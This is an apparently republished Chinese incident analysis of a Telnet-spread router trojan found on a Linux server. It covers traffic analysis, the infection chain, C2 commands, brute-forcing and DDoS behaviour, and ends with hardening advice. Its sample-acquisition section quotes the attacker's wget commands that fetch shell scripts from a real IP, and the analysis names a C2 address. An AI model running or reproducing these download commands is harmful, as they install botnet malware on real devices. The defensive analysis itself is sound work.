路由器木馬，其主要目标是控制網絡的核心路由設備;一旦攻擊成功，其危害性遠大于一台主機被控。

如果僅僅在路由器上面防範該類木馬，那也是不夠的，有很多Linux服務器違規開放Telnet端口，且使用了弱口令，一樣可以中招。下面我們就一起來回顧一起真實案例。

0x01 發現異常

在對客戶某服務器區域進行安全監測時發現某服務器通信流量存在大量Telnet協議。截取一段數據，進行協議統計：

Telnet協議一般為路由器管理協議，服務器中存在此協議可初步判斷為異常流量。繼續進行端口、IP走向統計：發現大量外部IP通過Tcp23端口(Telnet)連接該服務器。

此統計可說明：

該服務器違規開放了TCP23端口;

該服務器遭到大量Telnet攻擊，有可能是暴力破解，也有可能是已經成功連接。

挑選通信量較大的IP，篩選通信雙向數據：

查看Telnet數據，發現已經成功連接該服務器。

數據中還存在大量Telnet掃描探測、暴力破解攻擊，在此不再詳述。

0x02 獲取樣本

為進一步查看Telnet通信内容，Follow TcpStream。

将内容複制粘貼至文本編輯器：

發現一段自動下載命令：

1

2

wget http://208.67.1.42/bin.sh;

wget1 http://208.67.1.42/bin2.sh。

連接http://208.67.1.42/bin.sh可發現該腳本文件内容為自動下載獲取木馬，且木馬可感染arm、MIPS、x86、PowerPC等架構的設備。

0x03 木馬分析

(注：本章節不屬于Wireshark分析範疇，本文僅以jackmyx86分析為例)

該木馬文件是ELF格式的，影響的操作系統包括：

從上圖中判斷木馬下載的類型分别是：Mipsel,misp,x86(其實這個是x64),arm,x86(i586,i686)等。

從截獲的*.sh文件看，*.sh腳本想删除這些目錄和内容，并且關閉一些進程。

首先得到了一個”Art of war”的字符串(看來黑客是個文藝青年)。

接着嘗試打開路由器配置文件。

在配置文件裡查找字符串00000000，如果找到就直接填充0;

在初始化函數中：嘗試建立socket連接，連接地址為：208.67.1.194:164。

嘗試連接服務器，等待遠端服務器應答。

服務器發送“ping”命令後，客戶端返回“pong”表示已經連接成功。當發送“GETLOCALIP”後，返回控制端的本機IP。當服務器發送SCANNER後，根據ON或者OFF來控制是否要掃描指定IP，進行暴力破解。當發送“UDP”命令時候，向指定的IP地址發送大量UDP無效數據包。

下圖是木馬嘗試獲得路由器的用戶名和密碼匹配，企圖暴力破解賬戶和密碼。

在被控制之後，跟随服務器指定的IP，發送大量随機生成的長度為0x400的字符串數據，進行DDOS攻擊。下圖是發送垃圾數據,進行DDOS攻擊。

随機數據生成的僞代碼如下：

根據網址追溯到攻擊者的網頁和twitter賬号。

0x04 總結

路由器的管理如非必須，盡量不開放互聯網管理通道

路由器管理密碼必須強口令、最好超強

Linux服務器一般不要打開Telnet服務

該木馬一般利用爆破和漏洞來攻擊路由器或開啟Telnet服務的Linux服務器，中招後接受木馬作者的控制，最後進行大量DDOS攻擊

更多精彩资讯请关注tft每日頭條，我们将持续为您更新最新资讯!